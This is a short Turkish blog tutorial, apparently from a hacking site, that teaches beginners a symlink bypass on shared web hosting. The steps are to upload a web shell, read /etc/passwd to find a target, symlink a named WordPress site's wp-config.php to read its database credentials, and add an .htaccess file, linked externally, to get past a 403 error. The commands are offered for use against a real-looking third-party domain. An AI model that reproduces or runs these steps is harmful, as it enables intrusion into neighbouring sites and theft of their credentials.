Merhaba değerli specialzsec.blogspot.com üyeleri bu konuda sizlere ln -s bypassı anlatacağım yeni başlayanlar için yararlı olacaktır.
Öncelikle hedef sitemizin sunucusundaki her hangi bir siteye shell upload etmemiz gerekiyor.
Ben Bc oldum ve ordan gösterecegim
cat /etc/passwd yazıyoruz ve hedef sitemizi buluyoruz, bizim sunucumuz vhosts
hedef sitemiz: mebakablo.com
sitemiz bir WordPress Sitesi
ln -s /var/www/vhosts/mebakablo.com/httpdocs/wp-config.php 2.txt yazdık ve config dosyasını 2.txt olarak çektik.
Simdi shell attıgımız siteye gidip urlye 2.txt yazmalıyız
gördügünüz gibi 403 Forbidden hatası verdi bypasslamak için
htaccess koyuyoruz https://paste.ubuntu.com/p/HtY9q9QVS2/ (kodlar)
ve f5 atiyoruz
Yorum Gönder